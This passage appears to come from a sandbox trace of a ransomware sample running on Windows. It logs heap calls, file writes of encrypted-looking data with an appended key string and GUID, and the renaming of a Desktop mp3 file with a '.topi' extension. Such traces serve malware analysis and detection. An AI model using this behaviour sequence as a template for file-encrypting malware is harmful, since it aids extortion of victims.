(HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9228 | out: hHeap=0x680000) returned 1 [0094.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9210 | out: hHeap=0x680000) returned 1 [0094.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.830] GetCurrentThreadId () returned 0x8c4 [0094.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e2360 [0094.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.830] GetCurrentThreadId () returned 0x8c4 [0094.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9210 [0094.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0094.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9228 [0094.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91f8 [0094.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9240 [0094.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d89a0 [0094.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0094.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9210 | out: hHeap=0x680000) returned 1 [0094.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9210 [0094.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9210 | out: hHeap=0x680000) returned 1 [0094.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0094.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9240 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9228 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91f8 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91e0 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3fe8 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.834] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x10fd5, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x10fd5, lpOverlapped=0x0) returned 1 [0094.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0094.835] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x10fda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.835] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0094.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0094.836] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.836] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.836] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.836] CloseHandle (hObject=0x6a8) returned 1 [0094.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0094.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.843] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZyE WC9uJ8lrpGI.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zye wc9uj8lrpgi.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZyE WC9uJ8lrpGI.mp3.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zye wc9uj8lrpgi.mp3.topi")) returned 1 [0094.844] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.844] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.844] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.845] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.845] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38828410, ftCreationTime.dwHighDateTime=0x1d5bec5, ftLastAccessTime.dwLowDateTime=0x56b1ff50, ftLastAccessTime.dwHighDateTime=0x1d5be4e, ftLastWriteTime.dwLowDateTime=0x56b1ff50, ftLastWriteTime.dwHighDateTime=0x1d5be4e, nFileSizeHigh=0x0, nFileSizeLow=0x10fda, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyE WC9uJ8lrpGI.mp3", cAlternateFileName="ZYEWC9~1.MP3")) returned 0 [0094.846] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0094.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0094.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0094.846] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0094.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0094.846] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0094.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0094.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0094.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0094.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0094.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0094.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0094.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0094.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0094.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.850] RtlAllocateHeap (HeapHandle=0x680000, 